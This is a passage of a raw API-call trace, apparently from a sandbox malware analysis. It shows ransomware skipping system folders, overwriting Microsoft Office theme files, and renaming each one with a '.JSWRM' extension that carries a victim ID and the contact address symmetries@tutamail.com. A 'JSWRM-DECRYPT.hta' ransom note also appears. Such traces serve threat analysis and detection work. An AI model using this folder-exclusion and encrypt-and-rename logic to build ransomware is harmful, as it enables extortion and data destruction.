1 [0100.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0100.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0100.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0100.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.796] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Grunge Texture.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\grunge texture.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Grunge Texture.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\grunge texture.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0100.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0100.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0100.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0100.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0100.797] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11436ace, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11436ace, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xafab, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Inset.eftx", cAlternateFileName="INSET~1.EFT")) returned 1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2=".") returned 1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2="..") returned 1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2="...") returned 1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2="windows") returned -1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2="recovery") returned -1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2="perflogs") returned -1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2="documents and settings") returned 1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2="system volume information") returned -1 [0100.797] lstrcmpiW (lpString1="Inset.eftx", lpString2="msocache") returned -1 [0100.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0100.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Inset.eftx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Inset.eftx", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Inset.eftx", lpUsedDefaultChar=0x0) returned 10 [0100.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0100.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Inset.eftx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Inset.eftx", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Inset.eftx", lpUsedDefaultChar=0x0) returned 10 [0100.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0100.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0100.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Inset.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\inset.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.798] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=44971) returned 1 [0100.798] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xafa0) returned 0x24d210 [0100.798] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xafa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xafa0, lpOverlapped=0x0) returned 1 [0100.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.816] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xafa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xafa0, lpOverlapped=0x0) returned 1 [0100.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.816] CloseHandle (hObject=0x314) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0100.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0100.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0100.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0100.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.817] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Inset.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\inset.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Inset.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\inset.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0100.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.823] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a9b11a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x32a9b11a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x32a9b11a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0100.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0100.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0100.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0100.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0100.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0100.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0100.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0100.824] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114108ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb543, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Milk Glass.eftx", cAlternateFileName="MILKGL~1.EFT")) returned 1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2=".") returned 1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2="..") returned 1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2="...") returned 1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2="windows") returned -1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2="recovery") returned -1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2="perflogs") returned -1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2="documents and settings") returned 1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2="system volume information") returned -1 [0100.824] lstrcmpiW (lpString1="Milk Glass.eftx", lpString2="msocache") returned -1 [0100.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Milk Glass.eftx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Milk Glass.eftx", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Milk Glass.eftx", lpUsedDefaultChar=0x0) returned 15 [0100.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0100.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Milk Glass.eftx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Milk Glass.eftx", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Milk Glass.eftx", lpUsedDefaultChar=0x0) returned 15 [0100.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0100.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0100.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0100.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Milk Glass.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\milk glass.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.825] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46403) returned 1 [0100.825] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb540) returned 0x24d210 [0100.825] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb540, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb540, lpOverlapped=0x0) returned 1 [0100.838] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.838] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb540, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb540, lpOverlapped=0x0) returned 1 [0100.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.838] CloseHandle (hObject=0x314) returned 1 [0100.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0100.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0100.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0100.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0100.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0100.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.839] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Milk Glass.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\milk glass.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Milk Glass.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\milk glass.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0100.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0100.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0100.840] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11436ace, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb0ad, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Office 2007 - 2010.eftx", cAlternateFileName="OFFICE~1.EFT")) returned 1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2=".") returned 1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2="..") returned 1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2="...") returned 1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2="windows") returned -1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2="recovery") returned -1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2="perflogs") returned -1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2="documents and settings") returned 1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2="system volume information") returned -1 [0100.840] lstrcmpiW (lpString1="Office 2007 - 2010.eftx", lpString2="msocache") returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.eftx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0100.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.eftx", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office 2007 - 2010.eftx", lpUsedDefaultChar=0x0) returned 23 [0100.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.eftx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.eftx", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office 2007 - 2010.eftx", lpUsedDefaultChar=0x0) returned 23 [0100.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0100.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0100.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Office 2007 - 2010.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\office 2007 - 2010.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.841] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45229) returned 1 [0100.841] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.841] RtlAllocateHeap 